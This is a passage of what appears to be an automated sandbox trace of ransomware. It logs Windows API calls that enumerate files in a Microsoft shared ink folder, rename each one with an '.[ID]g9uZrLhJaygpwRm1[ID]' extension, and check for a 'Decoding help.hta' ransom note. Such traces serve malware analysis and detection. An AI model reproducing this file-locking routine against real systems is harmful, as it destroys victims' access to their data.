shared\\ink\\penusa.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.718] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa13b21, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x1fa13b21, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xba4df950, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x14c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="pipanel.dll", cAlternateFileName="")) returned 1 [0042.718] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.719] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.719] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.719] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.719] lstrcmpiW (lpString1="Decoding help.hta", lpString2="pipanel.dll") returned -1 [0042.719] lstrlenW (lpString="pipanel.dll") returned 11 [0042.719] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.719] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.719] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="pipanel.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll" [0042.719] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll" [0042.719] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.719] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipanel.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipanel.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.719] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fda5c09, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x1fda5c09, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x6f4de180, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="pipanel.exe", cAlternateFileName="")) returned 1 [0042.719] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.719] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.719] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.719] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.720] lstrcmpiW (lpString1="Decoding help.hta", lpString2="pipanel.exe") returned -1 [0042.720] lstrlenW (lpString="pipanel.exe") returned 11 [0042.720] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.720] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.720] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="pipanel.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe" [0042.720] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe" [0042.720] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0042.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipanel.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipanel.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipanel.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.722] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2043185d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x2043185d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xbae186c0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x0, dwReserved1=0x0, cFileName="pipres.dll", cAlternateFileName="")) returned 1 [0042.722] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.722] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.723] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.723] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.723] lstrcmpiW (lpString1="Decoding help.hta", lpString2="pipres.dll") returned -1 [0042.723] lstrlenW (lpString="pipres.dll") returned 10 [0042.723] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.723] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.723] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="pipres.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll" [0042.723] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll" [0042.723] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipres.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pipres.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pipres.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.723] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2612d14c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x2612d14c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xadc05c90, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0042.723] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.723] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.723] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.723] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.723] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rtscom.dll") returned -1 [0042.723] lstrlenW (lpString="rtscom.dll") returned 10 [0042.723] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.723] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.723] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="rtscom.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll" [0042.723] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll" [0042.723] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\rtscom.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\rtscom.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\rtscom.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.724] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2040b6fe, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x2040b6fe, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe2234520, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x0, dwReserved1=0x0, cFileName="skchobj.dll", cAlternateFileName="")) returned 1 [0042.724] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.724] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.724] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.724] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.724] lstrcmpiW (lpString1="Decoding help.hta", lpString2="skchobj.dll") returned -1 [0042.724] lstrlenW (lpString="skchobj.dll") returned 11 [0042.724] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.724] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.724] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="skchobj.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll" [0042.724] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll" [0042.724] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\skchobj.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchobj.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\skchobj.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.724] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2043185d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x2043185d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe2234520, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x0, dwReserved1=0x0, cFileName="skchui.dll", cAlternateFileName="")) returned 1 [0042.724] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.724] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.724] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.724] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.724] lstrcmpiW (lpString1="Decoding help.hta", lpString2="skchui.dll") returned -1 [0042.725] lstrlenW (lpString="skchui.dll") returned 10 [0042.725] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.725] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.725] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="skchui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll" [0042.725] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll" [0042.725] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\skchui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\skchui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\skchui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0043.970] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f5c335e, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x1f5c335e, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x7764cdc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabTip32.exe", cAlternateFileName="")) returned 1 [0045.633] lstrcpyW (in: lpString1=0x5e90c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0045.633] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0045.633] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0045.633] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0045.633] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TabTip32.exe") returned -1 [0045.633] lstrlenW (lpString="TabTip32.exe") returned 12 [0045.633] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0045.633] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0045.633] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="TabTip32.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe" [0045.633] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe" [0045.633] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0045.633] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tabtip32.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\TabTip32.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tabtip32.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0045.669] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37da0ed4, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x37da0ed4, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xaf635e30, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tiptsf.dll", cAlternateFileName="")) returned 1 [0048.871] lstrcpyW (in: lpString1=0x1116bbc0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0048.871] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0048.871] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0048.871] GetFileAttributesW 